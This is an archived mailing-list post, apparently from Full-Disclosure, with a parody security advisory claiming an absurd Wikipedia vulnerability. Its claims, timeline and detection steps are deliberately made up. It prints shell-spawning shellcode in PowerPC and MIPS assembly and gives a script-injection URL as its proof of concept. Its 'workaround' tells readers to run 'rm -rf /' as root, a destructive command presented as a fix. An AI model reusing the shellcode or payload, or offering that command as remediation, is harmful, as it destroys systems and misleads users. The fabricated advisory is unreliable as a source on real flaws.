|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
ringobingo
hush.ai
Date: Wed Sep 08 2010 - 17:03:21 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
RingoBingo TM Security Advisory 09.08.10
http://labs.ringobingo.net/intelligence/vulnerabilities/
Sep 8, 2010
I. BACKGROUND
RingoBingo Secuity TM has been finally acquired by Hewlatt Pachard
TM
for ~11.5M this weekend in a secret meeting in a location near
Hanover
Street. The sign has been placed on Sunday 12:45 GGM+1,5.
The IP agreements between parties require RingoBingo TM to perform
Unresponsive-Conpulsive Disclosure of undisclosed cyber-arms to
prevent improper dissemination of Copyrights and Other Things TM on
the
web. While aware that there are many employees of the Internet with
the
sole scope of Internet washing, it's of primary importance to
disseminate
this information to prevent proper exploitation by multiple parties
and
to reduce the global exposure.
Hewlatt Pachard TM analysts also demonstrated how it's possible to
reduce energy consumption by increasing the global threatcon as red
colors consume less power to be displayed than green or
yellow/orange
ones.
II. DESCRIPTION
Wikipedia TM software contains code written by intern of Hewlatt
Pachard TM and contains undocumented vulnerabilities. Since here at
RingoBingo Secuity TM we handle man pages and documentation errors
as
security issues we urge all the involved, uninvolved and
retroinvolved
(as well the underinvolved/underdesk ones) patries to patch their
man
pages by adding the string "-enable-write18" to the parameter list
of
Wikipedia TM.
During a 53-days long penetration test, and for the sole purpose of
a
proof of concept, our security team was able to successfully access
more than 3,400,000 internal pages of the Wikipedia TM system, if we
only consider the English-language subsystem. It can be seen that
only
drastic measures can prevent a large-scale leakage. Moreover we
think
that, if correctly exploited, this vulnerability can potentially
make
the core content of the Wikipedia (TM) system world-writable, *even
without the need of a privilege escalation*, with easily foreseeable
consequences.
III. ANALYSIS
The vulnerability is present in different Wikipedia php files. Let's
analyze one of them. By reverse engineering the file, we have the
following asm code:
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP)
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019
60632c48 lis r3,r3,11336
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002
60634c0c lis r3,r3,19468
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP)
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP)
7c0903a6 mtspr CTR,r0
4e800420 bctr
RingoBingo EST (Elite Security Team) was aware of the vulnerability
and
took the situation in hand. The team started to find a way to
subvert
the application and reverse engineered again the code, obtaining the
following:
sub $9,$9,$9
add $29,$29,-444
sw $9,444($29)
add $29,$29,444
add $29,$29,-4
lui $8,0x2f2f
ori $8,$8,0x7368
addi $29,$29,-444
sw $8,444($29)
addi $29,$29,444
addi $29,$29,-4
lui $8,0x2f62
ori $8,$8,0x696e
addi $29,$29,-444
sw $8,444($29)
addi $29,$29,444
addi $29,$29,-4
sw $29,444($29)
lw $4,444($29)
addi $4,$4,460
addi $4,$4,-456
sub $9,$9,$9
addi $29,$29,-444
sw $9,444($29)
addi $29,$29,444
addi $29,$29,-444
sw $4,440($29)
sw $29,436($29)
lw $5,436($29)
addi $5,$5,440
sub $9,$9,$9
andi $6,$9,0xffff
li $2,1059
syscall
THIS was the final and easy to read code that RingoBingo EST was
looking
for. One of the intern of the RingoBingo EST recognized this code,
he
wrote it during a hard-toilet session in his house at Long Beach,
and
was surprised that his code was used in Wikipedia PHP scripts. He
noticed some slight differences between this and his original code.
As you can see by these lines:
sw $9,444($29)
addi $29,$29,444
addi $29,$29,-444
sw $4,440($29)
sw $29,436($29)
The execution flow is modified by some external influences, that
will
cost the developer 9,444 US dollars. Again, the math got some
miscalculations, as 444 was first added and then substracted (-
444). By
adding a multiplicative factor of 4,440 we will obtain the total
amount
to pay: 29,436 US fuckin' dollars.
This is a very very uncommon, critical and hard to exploit
vulnerability. Our top researchers worked on this for 15'000 days,
24/7,
to produce a working and very user unfriendly PoC that allows
command
execution with root privileges in the context of a little circle
printed
on a little paper in an anonymous Panama's mailbox. Here's the PoC:
http://en.m.wikipedia.org/wiki?search=%27%22%3E%3Cscript%3Ealert%281
23%29%3C%2Fscript%3E
IV. DETECTION
Detection of this vulnerability is pretty easy. You have to wait for
moonlight and hope that it's a full moon night. Then, you need some
new-technology 3D glasses to identify monitor interferences caused
by
this vulnerability. Once equipped with this technology, you have to
count all the prime numbers from 1 to 31337 in chinese (Wikipedia IS
international), and perform a mind-race-condition on repeating the
last
prime number 1-3 thousand times. If this mind-race-condition
occurs, you
will be able to find the vulnerable php scripts on Wikipedia. Oh, I
forgot the last condition: you need to sleep while performing these
actions. Otherwise your neural waves will interfere with the monitor
frequences and the second step of this detection (3d glasses) will
fail.
That's it.
V. WORKAROUND
Simply shutdown your services. Our proven and tested technology
called
"Book" can protect your assets and your clients.
Update if you are in the +5 timezone: The following commands will
fix
the vulnerability, meanwhile the vendor is producing the proper
patch:
ssh rootwikipedia.org
<enter password when prompted>
rm -rf / & disown
VI. VENDOR RESPONSE
We don't belive in responses. We belive in under-deep security and
proactive man page reading.
VII. CVE INFORMATION
VIII. DISCLOSURE TIMELINE
217921.676106 - Man page iSCSI access in read-only
217921.681169 - First I/O error (seek is high, high, high)
At this point HAL was shutted down.
April 3rd, 0033, 05:55:23 - Sent a mail to vendor but the grave was
empty, he resurrected
October 10th, 1492, 12:56:22 - Sent a mail to American Headquarters
but
they didn't understand english
July 28th, 1914, 19:12:59 - Sent a mail to European Headquarters but
First World War started
July 1st, 2001, 13:23:53 - Sent a mail to actual vendor, but product
(Wikipedia) was not released yet
May 14th, 2045, 22:19:23 - Sent a mail to vendor, with a time
machine
May 15th, 2045, 22:19:22 - Vendor response, fix ready
September 9th, 2010, 01:13:23 - Came back to the present and
advisory
released
You are free to hack until May 15th 2045... enjoy the freshness!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]